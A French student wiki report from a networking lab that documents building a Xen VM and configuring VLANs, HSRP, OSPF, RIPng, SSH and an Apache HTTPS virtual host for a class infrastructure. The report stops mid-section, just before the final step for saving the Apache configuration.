Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
